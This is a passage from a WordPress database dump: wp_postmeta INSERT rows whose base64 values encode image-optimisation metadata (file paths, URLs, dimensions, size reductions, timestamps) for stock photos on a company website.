9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LTE2MDB4ODE3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjgxNywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMTYwMHg4MTcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LTE2MDB4ODE3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTcwOCwiaWQiOjE0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MTIsImlkIjoxNDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIxNTQ3NjE3LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NzE0LCJpZCI6MTQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMTU0NzYxNy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMTU0NzYxNy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMTU0NzYxNy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTcxNiwiaWQiOjE0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MTksImlkIjoxNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MjEsImlkIjoxNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MjMsImlkIjoxNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MjYsImlkIjoxNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MjgsImlkIjoxNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MzAsImlkIjoxNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjE1NDc2MTctNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3MzMsImlkIjoxNDR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30333, 143, 'wpfc_optimisation_reduction', '25145'); 
INSERT INTO `wp_postmeta` VALUES (30334, 143, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTI4NzIwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTI4NzIwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1Mjg3MjAuanBnIiwicmVkdWN0aW9uIjoyNTEzMSwidGltZSI6MTQ4MzU4OTc0MiwiaWQiOiIxNDMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc0NCwiaWQiOjE0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1Mjg3MjAtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1Mjg3MjAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1Mjg3MjAtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3NDcsImlkIjoxNDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTI4NzIwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTI4NzIwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTI4NzIwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NzUwLCJpZCI6MTQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0xNjAweDEwNjYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1Mjg3MjAtMTYwMHgxMDY2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0xNjAweDEwNjYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NzUzLCJpZCI6MTQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc1NSwiaWQiOjE0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1Mjg3MjAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1Mjg3MjAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1Mjg3MjAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk3NTcsImlkIjoxNDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTI4NzIwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTI4NzIwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTI4NzIwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NzYwLCJpZCI6MTQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc2MiwiaWQiOjE0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc2NCwiaWQiOjE0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc2NiwiaWQiOjE0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc2OSwiaWQiOjE0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc3MSwiaWQiOjE0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc3NCwiaWQiOjE0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUyODcyMC02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTc3NiwiaWQiOjE0M31d'); 
INSERT INTO `wp_postmeta` VALUES (30335, 142, 'wpfc_optimisation_reduction', '23564'); 
